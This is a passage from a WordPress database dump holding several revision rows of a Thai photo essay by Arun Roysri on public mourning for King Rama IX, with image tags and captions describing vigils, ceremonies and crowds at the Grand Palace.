style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n \r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" /> <img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 11:33:23', '2018-11-12 04:33:23', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4348, 3, '2018-11-12 11:41:56', '2018-11-12 04:41:56', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4316 size-large\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4317 size-large\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรํา ลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" /></p>\r\n<p style=\"text-align: center;\">ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n \r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 11:41:56', '2018-11-12 04:41:56', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4349, 3, '2018-11-12 11:44:01', '2018-11-12 04:44:01', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4316 size-large\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4317 size-large\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรํา ลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" /></p>\r\n<p style=\"text-align: center;\">ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n \r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 11:44:01', '2018-11-12 04:44:01', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
